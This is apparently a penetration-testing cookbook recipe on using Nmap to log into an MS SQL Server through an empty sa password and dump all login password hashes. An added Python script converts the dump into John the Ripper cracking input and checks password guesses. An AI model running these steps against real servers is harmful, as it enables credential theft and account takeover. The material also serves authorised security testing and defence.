Dumping password hashes of MS SQL servers
After gaining access to an MS SQL server, we can dump the password hashes of all its logins and crack them offline to compromise other accounts, including any that reuse the same passwords elsewhere. Nmap's ms-sql-dump-hashes script retrieves these hashes in a format that the cracking tool John the Ripper reads directly.
This recipe shows how to dump the password hashes of an MS SQL server with Nmap.
How to do it...
To dump all the password hashes of an MS SQL server whose system administrator (sa) account has an empty password, run the following Nmap command; ms-sql-empty-password authenticates as sa, and ms-sql-dump-hashes then uses that session to read the hashes:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be listed in the ms-sql-dump-hashes section of the script output:
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2011
Service Info: CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-empty-password:
|   [192.168.1.102\MSSQLSERVER]
|_    sa:<empty> => Login Success
| ms-sql-dump-hashes:
|   [192.168.1.102\MSSQLSERVER]
|     sa...
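The user:hash lines that ms-sql-dump-hashes prints are the raw values SQL Server stores for each login, and John the Ripper accepts them as-is once you tell it which format they are in. The following script, added here as an example and not part of the Nmap cookbook or of the Nmap project, shows what that format is: it parses a constructed copy of the scan output above into a John-ready list grouped by --format (mssql for SQL Server 2000, mssql05 for 2005/2008, mssql12 for 2012 and later), and it checks a candidate password against a hash the same way a cracker does. The hash construction follows SQL Server's documented scheme (a 2-byte version word, a 4-byte salt, then SHA-1 or SHA-512 over the UTF-16LE password followed by the salt); the host name, instance, logins, salt and passwords in the sample are made up for the example.

```python
"""Turn ms-sql-dump-hashes output into John the Ripper input and verify guesses.

Added example; not the Nmap cookbook's or the Nmap project's code.  The
sample scan output and the logins/passwords in it are constructed here.
"""
import hashlib
import hmac
import re


def make_hash(password, salt, fmt):
    """Build a SQL Server login hash the way the server does.

    fmt is the John the Ripper --format name for the layout:
      mssql05: 0x0100 | salt | SHA-1(UTF-16LE(pw) + salt)           (2005/2008)
      mssql12: 0x0200 | salt | SHA-512(UTF-16LE(pw) + salt)         (2012+)
      mssql:   0x0100 | salt | SHA-1(pw + salt) | SHA-1(UPPER(pw) + salt)  (2000)
    Hex is emitted upper-case, as the script prints it.
    """
    pw = password.encode("utf-16-le")
    if fmt == "mssql05":
        return "0x0100" + (salt + hashlib.sha1(pw + salt).digest()).hex().upper()
    if fmt == "mssql12":
        return "0x0200" + (salt + hashlib.sha512(pw + salt).digest()).hex().upper()
    if fmt == "mssql":
        up = password.upper().encode("utf-16-le")
        return "0x0100" + (salt + hashlib.sha1(pw + salt).digest()
                           + hashlib.sha1(up + salt).digest()).hex().upper()
    raise ValueError(f"unknown format {fmt}")


def john_format(hexhash):
    """Pick the John --format from the version word and total length, or None."""
    body = hexhash[2:] if hexhash.lower().startswith("0x") else hexhash
    version, length = body[:4].lower(), len(body)
    if version == "0100" and length == 4 + 8 + 40:
        return "mssql05"
    if version == "0100" and length == 4 + 8 + 80:
        return "mssql"
    if version == "0200" and length == 4 + 8 + 128:
        return "mssql12"
    return None


def verify(hexhash, password):
    """True if password produces hexhash: recompute with the embedded salt."""
    fmt = john_format(hexhash)
    if fmt is None:
        return False
    body = hexhash[2:] if hexhash.lower().startswith("0x") else hexhash
    salt = bytes.fromhex(body[4:12])  # bytes 2..5 of the stored value
    return hmac.compare_digest(make_hash(password, salt, fmt).lower(),
                               "0x" + body.lower())


# "|   [host\instance]" header and "|     user:0x..." entries, as NSE prints them
INSTANCE_LINE = re.compile(r"^\|[_\s]*\[([^\]]+)\]\s*$")
HASH_LINE = re.compile(r"^\|[_\s]*([^\s:\[][^:]*):(0x[0-9A-Fa-f]+)\s*$")


def parse_dump(scan_output):
    """Return {instance: [(user, hash), ...]} from the ms-sql-dump-hashes section."""
    creds, instance, in_section = {}, None, False
    for line in scan_output.splitlines():
        if "ms-sql-dump-hashes:" in line:
            in_section = True
            continue
        if not in_section:
            continue
        # stop at the end of host script results or at the next script's header
        if not line.startswith("|") or re.match(r"^\| \S+:", line):
            break
        m = INSTANCE_LINE.match(line)
        if m:
            instance = m.group(1)
            creds.setdefault(instance, [])
            continue
        m = HASH_LINE.match(line)
        if m and instance is not None:
            creds[instance].append((m.group(1).strip(), m.group(2)))
    return creds


def john_inputs(scan_output):
    """Group user:hash lines by John format; write each list to its own file
    and run `john --format=<fmt> <file>`.  Unrecognised layouts are dropped."""
    by_fmt = {}
    for entries in parse_dump(scan_output).values():
        for user, h in entries:
            fmt = john_format(h)
            if fmt is not None:
                by_fmt.setdefault(fmt, []).append(f"{user}:{h}")
    return by_fmt


# Constructed sample: fixed salt and made-up logins so the hashes round-trip.
SALT = bytes.fromhex("A1B2C3D4")
INSTANCE = "192.168.1.102\\MSSQLSERVER"
SAMPLE_SCAN = "\n".join([
    "Host script results:",
    "| ms-sql-empty-password: ",
    "|   [" + INSTANCE + "]",
    "|_    sa:<empty> => Login Success",
    "| ms-sql-dump-hashes: ",
    "|   [" + INSTANCE + "]",
    "|     sa:" + make_hash("", SALT, "mssql05"),
    "|     backup_svc:" + make_hash("Summer2012!", SALT, "mssql12"),
    "|_    legacy_app:" + make_hash("Legacy1", SALT, "mssql"),
])

if __name__ == "__main__":
    for fmt, lines in john_inputs(SAMPLE_SCAN).items():
        print(f"# john --format={fmt}")
        print("\n".join(lines))
```

The length check in john_format matters in practice: a 2012+ server still stores any logins migrated from an older instance with their old 0x0100 layout, so one dump can contain several formats, and John only cracks the lines that match the format you pass it.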